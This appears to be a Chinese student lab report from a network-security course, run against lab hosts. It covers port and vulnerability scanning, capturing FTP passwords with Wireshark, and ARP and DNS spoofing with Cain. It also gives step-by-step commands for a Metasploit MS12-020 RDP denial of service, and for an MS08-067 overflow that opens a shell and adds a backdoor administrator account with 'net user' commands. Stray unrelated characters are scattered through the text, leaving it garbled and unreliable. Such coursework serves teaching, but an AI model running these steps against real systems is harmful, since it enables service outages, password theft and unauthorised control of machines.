NMap端口掃描
NMap是用來掃描網(wǎng)絡(luò)上計算機(jī)開放的網(wǎng)絡(luò)連接端口。
- Nmap GUI的使用
在Target
中輸入目標(biāo)IP地址,掃描方式選擇regular scan
力试,點擊scan
,即可得到目標(biāo)主機(jī)開放的端口。 - 命令行的使用
進(jìn)行上述GUI掃描的命令是:nmap IP
對指定端口進(jìn)行掃描的命令是:nmap -p portnumber IP
對目標(biāo)主機(jī)進(jìn)行全連接掃描(穩(wěn)定可靠但容易被日志記錄)的命令是:nmap -sT IP
對目標(biāo)主機(jī)進(jìn)行半開連接掃描(更隱蔽)的命令是:nmap -sS IP
保存掃描結(jié)果的掃描命令是:nmap -oX filename IP
- 課后習(xí)題
組合命令如:同時保存掃描結(jié)果并以半開連接方式掃描:nmap -sS -oX filename IP
識別主機(jī)操作系統(tǒng)的命令是:nmap -O IP
綜合掃描X-Scan
X-Scan采用多線程方式對指定IP地址段進(jìn)行安全漏洞檢測糯笙。
- 設(shè)置X-Scan參數(shù)
在菜單欄設(shè)置->掃描參數(shù)
中,有以下這些選項:
- 掃描模塊:包含服務(wù)和協(xié)議弱口令等信息的掃描
- 并發(fā)掃描:對掃描的并發(fā)數(shù)量進(jìn)行設(shè)置
- 掃描報告:設(shè)定掃描完成后報告生成情況
- 其他設(shè)置:對掃描進(jìn)度的顯示等
- 端口設(shè)置:設(shè)置想要掃描的端口撩银、檢測方式等內(nèi)容(本實驗填21给涕,即
FTP
)
- 進(jìn)行掃描
設(shè)置完成后點擊文件->開始掃描
,自動生成報告额获,觀察到已破解FTP
弱口令:
ftp://192.168.1.3
够庙,輸入以上用戶名和口令,成功登陸:
- 課后習(xí)題
- 防火墻對掃描軟件有屏蔽作用耘眨,因為它可以把掃描軟件發(fā)出的數(shù)據(jù)包丟掉而不作出回應(yīng)。
- 服務(wù)攻擊是讓目標(biāo)機(jī)器停止提供服務(wù)的攻擊境肾,不是針對某種特定網(wǎng)絡(luò)的剔难。
AWVS掃描器掃描web漏洞
AWVS可以掃描任何可通過Web瀏覽器訪問的Web站點和Web應(yīng)用程序,可通過SQL注入攻擊奥喻、跨站腳本攻擊等審核應(yīng)用程序的安全性偶宫。
- 基本用法
單擊工具欄中的new scan
,輸入URL:192.168.1.3:8001
环鲤,一直點擊下一步直到Finish
纯趋,掃描結(jié)果如下:
- 高級功能
在上圖左欄中選擇tools
中的site crawler
,點擊start
,即可進(jìn)行站點爬行吵冒。
在上圖左欄中選擇tools
中的target finder
纯命,可找出web服務(wù)器。
- 課后習(xí)題
AWVS的其他功能如:選擇tools
中的http sniffer
桦锄,可以實現(xiàn)抓包:
http editor
,使用http editor
進(jìn)行編輯和重放结耀,如圖:
AppScan掃描web漏洞
AppScan通過爬行發(fā)現(xiàn)整個web應(yīng)用結(jié)構(gòu)留夜,發(fā)送修改的HTTP Request進(jìn)行攻擊,驗證是否存在安全漏洞图甜。
- 開啟掃描
選擇文件->新建
中的常規(guī)掃描碍粥,并選中啟動掃描配置向?qū)В琔RL填寫192.168.1.3:8001
黑毅,之后一直選是直到得到掃描結(jié)果:
- 課后習(xí)題
分析掃描結(jié)果:以SQL注入攻擊為例矿瘦,它是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串枕面,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。該問題存在于該站點的see.asp
網(wǎng)頁的titleID
和ID
缚去、list.asp
網(wǎng)頁的Photoer
和KeyWords
潮秘、exif.asp
網(wǎng)頁的id
、content.asp
網(wǎng)頁的ID2
等變量中易结。
appscan的功能是進(jìn)行漏洞檢查枕荞,而不是進(jìn)行漏洞攻擊。
御劍web后臺敏感目錄掃描
御劍掃描工具主要用來掃描目標(biāo)站點的敏感目錄搞动。
- 基本使用
在域名中輸入192.168.1.3:8001
躏精,點擊開始掃描,掃描結(jié)果如下:
- 掃描結(jié)果分析
http響應(yīng)
為200說明該頁面可訪問鹦肿。例如雙擊index.asp
即可進(jìn)入目標(biāo)站點的主頁矗烛,雙擊FCKeditor/_whatsnew.html
可知道該站點的編輯器類型為FCK及其版本號。 - 課后習(xí)題
敏感目錄如后臺管理頁面箩溃、cms類型以及版本等高诺,即包含站點關(guān)鍵信息的頁面。
可在login.asp
頁面看到網(wǎng)站數(shù)據(jù)庫為asp+access
:
FTP連接與密碼明文抓取-wireshark
Wireshark是一個網(wǎng)絡(luò)封包分析軟件碾篡,它擷取網(wǎng)絡(luò)封包虱而,并盡可能顯示出最詳細(xì)的有關(guān)資料。
- 抓包參數(shù)的設(shè)置
在Capture
菜單中設(shè)置抓包的相關(guān)參數(shù)开泽,如interfaces
選項顯示可操作性的網(wǎng)絡(luò)適配器牡拇,options
選項設(shè)置如抓包模式、過濾器等參數(shù)。點擊start
開始惠呼。 -
數(shù)據(jù)包的解析
- 第一行為Wireshark添加的該幀的統(tǒng)計信息导俘,包括捕獲時間、編號剔蹋、幀長度旅薄、協(xié)議等。
- 第二行為鏈路層信息泣崩,包括目的MAC地址少梁,源MAC地址,上層協(xié)議類型矫付。
- 第三行為網(wǎng)絡(luò)層信息凯沪,此處為IP協(xié)議,包括版本买优、頭部長度妨马、總長度、標(biāo)志位等杀赢。
- 第四行為傳輸層信息烘跺,包括源/目的端口、序列號脂崔、期望的下一個序列號等液荸。
- 第五行為應(yīng)用層,此處為FTP協(xié)議脱篙,顯示的是響應(yīng)內(nèi)容。
- 建立連接
設(shè)置完參數(shù)后點擊start
按鈕開始抓包伤柄,在地址欄輸入ftp:\192.168.1.3
绊困,輸入默認(rèn)賬號和密碼。
在filter中輸入ftp
過濾出數(shù)據(jù)包适刀,看到輸入的賬號和密碼:
- 課后習(xí)題
DNS依賴于UDP秤朗,F(xiàn)TP依賴于TCP
由實驗過程可知,訪問FTP需要賬戶和密碼笔喉。
如何合理設(shè)置抓包規(guī)則:在caption
的option
中:
- 抓取http報文:輸入
tcp port 80
取视,因為大部分Web網(wǎng)站都是工作在80端口的 - 抓取arp報文:輸入
ether proto 0x0806
虱黄,這個字段的值表示是ARP報文 - 只抓取與某主機(jī)的通信:輸入
host IP
:
利用arp協(xié)議缺陷實現(xiàn)中間人攻擊及內(nèi)網(wǎng)DNS欺騙
ARP協(xié)議是根據(jù)IP地址獲取物理地址的一個TCP/IP協(xié)議靴患,攻擊者可以通過修改arp高速緩存來實現(xiàn)攻擊。
DNS是將域名和IP互相映射的網(wǎng)絡(luò)應(yīng)用的基礎(chǔ)設(shè)施鞋吉。DNS攻擊和ARP攻擊原理相同奄毡,但是要事先知道DNS查詢請求ID折欠。
CAIN是一個實現(xiàn)各種中間人攻擊的軟件。
- 利用cain進(jìn)行arp欺騙
打開cain軟件,在configure
中選擇網(wǎng)卡锐秦,再依次點擊start->sniffer->hosts->scan mac address
咪奖,掃描出本網(wǎng)段除本機(jī)以外的其他機(jī)器。只保留192.168.1.3
和192.168.1.4
酱床。
掃描出mac地址后羊赵,在arp
選項中添加這兩個地址。
arp
緩存:
arp
按鈕實施poisoning
:
arp
緩存扇谣,發(fā)現(xiàn)mac地址被改變:
2.利用cain抓取ftp密碼
在192.168.1.3
系統(tǒng)中昧捷,連接192.168.1.4
搭建的ftp服務(wù)器,輸入賬戶名和密碼揍堕。
再切換到192.168.1.2
系統(tǒng)中料身,選擇cain下方的passwords選項,點擊左側(cè)ftp衩茸,可以看到有一條anonymous芹血,說明ftp允許匿名登錄。
首先解析正確的
www.shiyanbar.com
域名:nslookup -qt=A www.shiyanbar.com 192.168.1.4
:切換到
192.168.1.2
中楞慈,點擊arp
,選擇arp-dns
幔烛,點擊加號,將解析ip改為1.1.1.1
囊蓝。重新使用
192.168.1.3
查詢域名IP:如何防范arp中間人攻擊:
- 在主機(jī)綁定網(wǎng)關(guān)MAC與IP地址為靜態(tài)(默認(rèn)為動態(tài))饿悬,命令:
arp -s IP MAC
- 在網(wǎng)關(guān)綁定主機(jī)MAC與IP地址
- 使用ARP防火墻
msf利用遠(yuǎn)程桌面協(xié)議RDP拒絕訪問漏洞
RDP(遠(yuǎn)程桌面協(xié)議)是一個讓客戶端連上服務(wù)器的協(xié)議。windows在處理某些報文時存在錯誤聚霜,會造成服務(wù)停止響應(yīng)狡恬。
1.攻擊步驟
在linux終端輸入nmap -sS -Pn -A 192.168.1.3
掃描主機(jī),發(fā)現(xiàn)端口3389打開蝎宇。
輸入msfconsole
命令弟劲,再輸入search ms12_020
,查找遠(yuǎn)程桌面相關(guān)參數(shù)姥芥。
輸入命令
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
來定義exploits參數(shù)兔乞。輸入命令show options
,查看需要配置的參數(shù):設(shè)置遠(yuǎn)程主機(jī)IP:
set RHOST 192.168.1.3
輸入命令
exploit
進(jìn)行攻擊凉唐。目標(biāo)主機(jī)藍(lán)屏重啟庸追,說明攻擊成功。
- 課后習(xí)題
如何啟動msf圖像界面:輸入命令msfgui
:
MS08067利用方法
利用MS08067遠(yuǎn)程溢出工具發(fā)送特殊構(gòu)造的數(shù)據(jù)包台囱,使目標(biāo)主機(jī)產(chǎn)生溢出淡溯,然后執(zhí)行shellcode代碼,打開目標(biāo)主機(jī)端口簿训,使用telnel鏈接目標(biāo)端口血筑,獲得系統(tǒng)權(quán)限绘沉。
- 運(yùn)行MS08067遠(yuǎn)程溢出軟件
在命令行中運(yùn)行MS08067.exe:MS08067.exe 192.168.1.3
- 鏈接遠(yuǎn)程主機(jī)并添加用戶
輸入命令telnet 192.168.1.3 4444
連接目標(biāo)主機(jī)。
輸入命令net user aaa 123456 /add
在目標(biāo)主機(jī)上添加賬戶豺总。
輸入命令net localgroup administrators aaa /add
车伞,把a(bǔ)aa用戶添加到管理組。
輸入命令net user aaa
驗證aaa是否添加成功喻喳。
打開mstsc
另玖,輸入賬號和密碼,成功登陸:
- 課后習(xí)題
為什么telnet 4444端口:因為MS08067.exe進(jìn)行緩沖區(qū)溢出的是4444端口表伦。
分析討論
本章實驗實現(xiàn)的功能是:掃描(端口掃描谦去、綜合掃描、web漏洞掃描蹦哼、后臺敏感目錄掃描)鳄哭、網(wǎng)絡(luò)封包分析、欺騙攻擊(arp欺騙纲熏、DNS欺騙)妆丘、攻擊(Dos攻擊、遠(yuǎn)程溢出攻擊)局劲。
總結(jié)起來勺拣,最常見的網(wǎng)絡(luò)上被利用的漏洞有:
- Cookie中毒--身份偽裝:通過處理存放在瀏覽器cookie中的信息,黑客偽裝成合法的用戶然后就可以存取用戶的信息鱼填。許多Web應(yīng)用程序使用客戶機(jī)上的cookie來保存信息(用戶身份药有、時間戳等等)。由于cookie通常都沒有加密苹丸,黑客可以對它們進(jìn)行修改愤惰,這樣就可以通過這些"中了毒的cookie"來欺騙應(yīng)用程序。心存惡意的用戶可以訪問他人的賬戶然后象真正用戶那樣行事赘理。如1.7中的arp和dns欺騙宦言。
- 緩沖區(qū)溢出--業(yè)務(wù)終止:通過使用某種形式的數(shù)據(jù)流,用過量的信息使服務(wù)器超載感憾,黑客常常能夠使服務(wù)器崩潰從而關(guān)閉網(wǎng)站。如1.9節(jié)中的遠(yuǎn)程溢出攻擊令花。
- 篡改參數(shù)--欺詐:這種技術(shù)改變網(wǎng)站URL的參數(shù)阻桅。很多web應(yīng)用程序無法確定嵌入在超鏈接中CGI參數(shù)的正確性。比如說兼都,允許信用卡使用500嫂沉,000元這樣大額的限制,跳過網(wǎng)站的登陸界面以及允許對取消后的訂單和客戶信息進(jìn)行訪問扮碧。